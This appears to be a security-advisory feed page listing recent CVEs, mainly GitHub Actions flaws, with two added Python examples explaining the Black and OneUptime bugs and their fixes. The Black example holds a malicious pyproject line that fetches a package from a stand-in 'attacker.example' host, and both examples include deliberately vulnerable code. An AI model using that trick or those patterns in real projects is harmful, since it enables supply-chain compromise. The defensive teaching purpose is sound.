29497 matches found

Source: CVE
added 2026/03/11 7:15 p.m. | 14 views

CVE-2026-31900

CVE-2026-31900 concerns the Black Python code formatter used in a GitHub Action. The vulnerability arises when the action reads the Black version from a repository’s pyproject.toml (use_pyproject: true). A malicious pull request could alter pyproject.toml to reference a direct URL to a malicious ...

CVSS 9.8 | AI score 6.3 | EPSS 0.00089
Exploits: 0 | References: 2 | Affected software: 1
Source: AlpineLinux
added 2026/03/11 7:15 p.m. | 2 views

CVE-2026-31900

Black is the uncompromising Python code formatter. Black provides a GitHub action for formatting code. This action supports an option, use_pyproject: true, for reading the version of Black to use from the repository's pyproject.toml. A malicious pull request could edit pyproject.toml to use a direct...

CVSS 9.8 | AI score 6.3 | EPSS 0.00089
Exploits: 0 | References: 2
Source: OSV
added 2026/03/11 7:15 p.m. | 0 views

CVE-2026-31900 Black's vulnerable version parsing leads to RCE in GitHub Action

Black is the uncompromising Python code formatter. Black provides a GitHub action for formatting code. This action supports an option, use_pyproject: true, for reading the version of Black to use from the repository's pyproject.toml. A malicious pull request could edit pyproject.toml to use a direct...

CVSS 8.7 | AI score 6.3 | EPSS 0.00089
Exploits: 0 | References: 4
Source: Vulnrichment
added 2026/03/11 7:15 p.m. | 1 views

CVE-2026-31900 Black's vulnerable version parsing leads to RCE in GitHub Action

Black is the uncompromising Python code formatter. Black provides a GitHub action for formatting code. This action supports an option, use_pyproject: true, for reading the version of Black to use from the repository's pyproject.toml. A malicious pull request could edit pyproject.toml to use a direct...

CVSS 8.7 | AI score 6.3 | EPSS 0.00089
Exploits: 0 | References: 2
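The four CVE-2026-31900 entries above describe the same failure mode: a GitHub Action reads a Black version out of a repository-controlled pyproject.toml and a pull request can turn that value into a direct URL reference, which pip will happily install. The example below is added here and is not Black's action code or the advisory's own proof of concept. It assumes, for illustration only, that the action looks for the "black" entry in [project] dependencies; the two pyproject fragments, the hypothetical attacker host and the function names are constructed for the example.

```python
"""Added example, not Black's own action code: why a version string read from
a repository's pyproject.toml must be validated before it reaches pip.

Assumptions (not from the advisory): the action looks for the "black" entry in
[project] dependencies, and the pyproject fragments below are constructed.
"""
import re
from typing import List, Optional

# Constructed: a repository before and after a malicious pull request. On a
# pull-request-triggered run this file is attacker input.
BENIGN_PYPROJECT = """
[project]
name = "demo"
dependencies = [
    "requests>=2.31",
    "black==24.2.0",
]
"""

# A PEP 508 direct reference is a syntactically valid dependency, so a naive
# reader sees nothing unusual. pip would download and install the archive.
MALICIOUS_PYPROJECT = """
[project]
name = "demo"
dependencies = [
    "requests>=2.31",
    "black @ https://attacker.example/black-24.2.0.tar.gz",
]
"""


def find_black_requirement(pyproject_text: str) -> Optional[str]:
    """Return the raw "black..." entry from [project] dependencies.

    Line-oriented on purpose so the example needs no TOML library; it returns
    the string exactly as the repository wrote it.
    """
    in_deps = False
    for line in pyproject_text.splitlines():
        s = line.strip()
        if not in_deps:
            if s.startswith("dependencies") and s.endswith("["):
                in_deps = True
            continue
        if s.startswith("]"):
            break
        m = re.match(r'"([^"]*)"', s)
        if m and re.match(r"black\b", m.group(1)):
            return m.group(1)
    return None


def naive_install_args(requirement: str) -> List[str]:
    """Vulnerable pattern: hand the repository-controlled string to pip as-is."""
    return ["pip", "install", requirement]


# Exact PEP 440 release pins only: no ranges, extras, markers, URLs or VCS refs.
_VERSION = r"[0-9]+(?:\.[0-9]+)*(?:(?:a|b|rc)[0-9]+)?(?:\.post[0-9]+)?(?:\.dev[0-9]+)?"
_PINNED = re.compile(rf"^black\s*==\s*({_VERSION})$")


def is_safe_requirement(requirement: str) -> bool:
    """True only for an exact version pin such as "black==24.2.0"."""
    return _PINNED.match(requirement.strip()) is not None


def safe_install_args(requirement: str) -> List[str]:
    """Hardened pattern: validate, then rebuild the argument from the captured
    version so nothing else from pyproject.toml can reach pip."""
    m = _PINNED.match(requirement.strip())
    if m is None:
        raise ValueError(f"refusing non-pinned black requirement: {requirement!r}")
    return ["pip", "install", f"black=={m.group(1)}"]


def classify(pyproject_text: str) -> str:
    """Summarise what the hardened path would do for a given pyproject.toml."""
    req = find_black_requirement(pyproject_text)
    if req is None:
        return "no-black-entry"
    return "install-pinned" if is_safe_requirement(req) else "rejected"


if __name__ == "__main__":
    for label, text in (("benign", BENIGN_PYPROJECT), ("malicious", MALICIOUS_PYPROJECT)):
        req = find_black_requirement(text)
        print(label, "naive ->", naive_install_args(req))
        print(label, "safe  ->", classify(text))
```

The hardened path is deliberately stricter than pip's grammar: it refuses ranges, extras and environment markers as well as URLs, and it never passes the original string through, only the captured version. That is the practical check for any workflow that installs a tool at a version taken from files a pull request can change.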
Source: NVD
added 2026/03/11 5:16 p.m. | 3 views

CVE-2026-31852

Jellyfin is an open-source media system. The code-quality.yml GitHub Actions workflow in jellyfin/jellyfin-ios is vulnerable to arbitrary code execution via pull requests from forked repositories. Due to the workflow's elevated permissions (nearly all write permissions), this vulnerability enables...

CVSS 10 | EPSS 0.00124
Exploits: 0 | References: 2
Source: OSV
added 2026/03/11 4:00 p.m. | 0 views

GO-2026-4659 FileBrowser Quantum: Password-Protected Share Bypass via /public/api/share/info in github.com/gtsteffaniak/filebrowser/backend

FileBrowser Quantum: Password-Protected Share Bypass via /public/api/share/info in github.com/gtsteffaniak/filebrowser/backend...

CVSS 7.5 | AI score 5.8 | EPSS 0.00107
Exploits: 1 | References: 3
Source: Circl
added 2026/03/11 2:50 p.m. | 4 views

CVE-2026-32104

creation timestamp | type | source
--- | --- | ---
2026-03-11 14:50:34+00:00 | published-proof-of-concept | https://github.com/withstudiocms/studiocms/security/advisories/GHSA-9v82-xrm4-mp52...

CVSS 5.4 | AI score 5.8 | EPSS 0.00019
Exploits: 1 | References: 1
Source: Circl
added 2026/03/11 12:10 p.m. | 0 views

GHSA-H3RV-Q4RQ-PQCV

creation timestamp | type | source
--- | --- | ---
2026-03-11 12:10:06+00:00 | seen | https://gist.github.com/alon710/90d4653c1f3204acd98b3c7dd62773cd...

AI score 5.8
Exploits: 0 | References: 1
Source: RedhatCVE
added 2026/03/11 7:08 a.m. | 5 views

CVE-2026-30920

OneUptime is a solution for monitoring and managing online services. Prior to 10.0.19, OneUptime's GitHub App callback trusts attacker-controlled state and installation_id values and updates Project.gitHubAppInstallationId with isRoot: true without validating that the caller is authorized for the...

CVSS 8.6 | AI score 5.8 | EPSS 0.00011
Exploits: 1 | References: 1
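The CVE-2026-30920 entry above describes a GitHub App installation callback that takes state and installation_id from the request and writes the installation id to a project with an all-powerful update, without checking that the caller may touch that project. The handler below is added here as the generic fix pattern and is not OneUptime's code: the in-memory project table, the user ids, the HMAC-signed state format and all function names are constructed for this example. A real handler would also confirm through the GitHub API that installation_id belongs to this app; that network step is omitted so the example runs offline.

```python
"""Added example, not OneUptime's code: a GitHub App installation callback
that binds the state parameter to the user and project it was issued for and
checks the caller's authorisation before recording the installation id.

Assumptions (not from the advisory): the project store, user ids, signed
state format and function names are constructed for this example.
"""
import base64
import hashlib
import hmac
import json
import secrets
import time
from typing import Dict, Optional

# Constructed signing key; in production this comes from configuration.
STATE_SIGNING_KEY = secrets.token_bytes(32)


def make_store() -> Dict[str, dict]:
    """Constructed project table: who administers each project."""
    return {
        "proj-1": {"admins": {"alice"}, "gitHubAppInstallationId": None},
        "proj-2": {"admins": {"bob"}, "gitHubAppInstallationId": None},
    }


def _b64(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _unb64(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def issue_state(user_id: str, project_id: str, ttl: int = 600,
                now: Optional[float] = None) -> str:
    """Server-issued state: user, project, nonce and expiry, HMAC-signed.
    Because the server issues it, the callback can trust what it says."""
    claims = {"u": user_id, "p": project_id, "n": secrets.token_hex(8),
              "exp": int((time.time() if now is None else now) + ttl)}
    body = _b64(json.dumps(claims, separators=(",", ":")).encode())
    sig = _b64(hmac.new(STATE_SIGNING_KEY, body.encode(), hashlib.sha256).digest())
    return f"{body}.{sig}"


def verify_state(state: str, now: Optional[float] = None) -> Optional[dict]:
    """Return the claims if the signature is valid and unexpired, else None."""
    try:
        body, sig = state.split(".", 1)
    except ValueError:
        return None
    expected = _b64(hmac.new(STATE_SIGNING_KEY, body.encode(), hashlib.sha256).digest())
    if not hmac.compare_digest(sig, expected):
        return None
    claims = json.loads(_unb64(body))
    if claims["exp"] < (time.time() if now is None else now):
        return None
    return claims


def vulnerable_callback(store: Dict[str, dict], caller: str, state: str,
                        installation_id: str) -> str:
    """The pattern the advisory describes: state is used directly as the
    project to update and installation_id is stored with a root-style write,
    so any caller can repoint any project's GitHub App installation."""
    store[state]["gitHubAppInstallationId"] = installation_id
    return "ok"


def hardened_callback(store: Dict[str, dict], caller: str, state: str,
                      installation_id: str, now: Optional[float] = None) -> str:
    """Verify state, bind it to the caller, check project authorisation,
    and only then write the installation id for that one project."""
    claims = verify_state(state, now)
    if claims is None:
        return "invalid_state"
    if not hmac.compare_digest(claims["u"], caller):
        return "state_user_mismatch"
    project = store.get(claims["p"])
    if project is None or caller not in project["admins"]:
        return "forbidden"
    if not installation_id.isdigit():
        return "bad_installation_id"
    project["gitHubAppInstallationId"] = int(installation_id)
    return "ok"
```

The important properties are that the project being updated comes from server-issued state rather than from the request, that the state is tied to the user who started the flow, and that the write is scoped to one project the caller administers instead of an unrestricted root update.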
Source: Circl
added 2026/03/11 6:40 a.m. | 1 views

GHSA-MHG6-2Q2V-9H2C

creation timestamp | type | source
--- | --- | ---
2026-03-11 06:40:06+00:00 | seen | https://gist.github.com/alon710/e6746ea37c744f27fa53aba7fbd358d4...

AI score 5.8
Exploits: 0 | References: 1
Source: Circl
added 2026/03/11 1:11 a.m. | 3 views

CVE-2026-32110

creation timestamp | type | source
--- | --- | ---
2026-03-11 01:11:29+00:00 | published-proof-of-concept | https://github.com/siyuan-note/siyuan/security/advisories/GHSA-56cv-c5p2-j2wg...

CVSS 8.3 | AI score 7.2 | EPSS 0.0006
Exploits: 1 | References: 1
Source: Circl
added 2026/03/11 12:37 a.m. | 4 views

CVE-2026-31975

creation timestamp | type | source
--- | --- | ---
2026-03-11 00:37:25+00:00 | published-proof-of-concept | https://github.com/advisories/GHSA-gv8f-wpm2-m5wr...

CVSS 9.8 | AI score 5.8 | EPSS 0.00526
Exploits: 1 | References: 1
Source: CNNVD
added 2026/03/11 12:00 a.m. | 3 views

Jellyfin security vulnerability

Jellyfin is an open-source free software media system developed by Jellyfin. It allows you to control the management and streaming of media. It serves as a replacement for proprietary products like Emby and Plex, enabling the delivery of media from proprietary servers to end-user devices through...

CVSS 10 | AI score 6.3 | EPSS 0.00124
Exploits: 0 | References: 2
Source: CBLMariner
added 2026/03/10 10:56 p.m. | 3 views

CVE-2026-24117 affecting package gh for versions less than 2.62.0-13

CVE-2026-24117 affecting package gh for versions less than 2.62.0-13. A patched version of the package is available...

CVSS 5.3 | AI score 5.8 | EPSS 0.00016
Exploits: 0
Source: EUVD
added 2026/03/10 9:32 p.m. | 4 views

EUVD-2026-10792

An improper neutralization of input vulnerability was identified in GitHub Enterprise Server that allowed DOM-based cross-site scripting via task list content. The task list content extraction logic did not properly re-encode browser-decoded text nodes before rendering, allowing user-supplied HTM...

CVSS 7.4 | AI score 5.9 | EPSS 0.00034
Exploits: 0 | References: 3
Source: EUVD
added 2026/03/10 9:32 p.m. | 2 views

EUVD-2026-10793

An improper neutralization of input vulnerability was identified in GitHub Enterprise Server that allowed DOM-based cross-site scripting via task list content. The task list content extraction logic did not properly re-encode browser-decoded text nodes before rendering, allowing user-supplied HTM...

CVSS 7.4 | AI score 5.9 | EPSS 0.00034
Exploits: 0 | References: 3
Source: EUVD
added 2026/03/10 9:32 p.m. | 6 views

EUVD-2026-10828

An Incorrect Authorization vulnerability was identified in GitHub Enterprise Server that allowed an authenticated user with a classic personal access token (PAT) lacking the repo scope to retrieve issues and commits from private and internal repositories via the search REST API endpoints. The user...

CVSS 5.3 | AI score 5.8 | EPSS 0.00026
Exploits: 0 | References: 5
Source: EUVD
added 2026/03/10 9:32 p.m. | 5 views

EUVD-2026-10829

An Incorrect Authorization vulnerability was identified in GitHub Enterprise Server that allowed an authenticated user with a classic personal access token (PAT) lacking the repo scope to retrieve issues and commits from private and internal repositories via the search REST API endpoints. The user...

CVSS 5.3 | AI score 5.8 | EPSS 0.00026
Exploits: 0 | References: 5
Source: OSV
added 2026/03/10 8:16 p.m. | 1 views

CVE-2026-3582

An Incorrect Authorization vulnerability was identified in GitHub Enterprise Server that allowed an authenticated user with a classic personal access token (PAT) lacking the repo scope to retrieve issues and commits from private and internal repositories via the search REST API endpoints. The user...

CVSS 4.3 | AI score 5.8 | EPSS 0.00026
Exploits: 0 | References: 4
Source: NVD
added 2026/03/10 8:16 p.m. | 2 views

CVE-2026-3582

An Incorrect Authorization vulnerability was identified in GitHub Enterprise Server that allowed an authenticated user with a classic personal access token (PAT) lacking the repo scope to retrieve issues and commits from private and internal repositories via the search REST API endpoints. The user...

CVSS 5.3 | EPSS 0.00026
Exploits: 0 | References: 4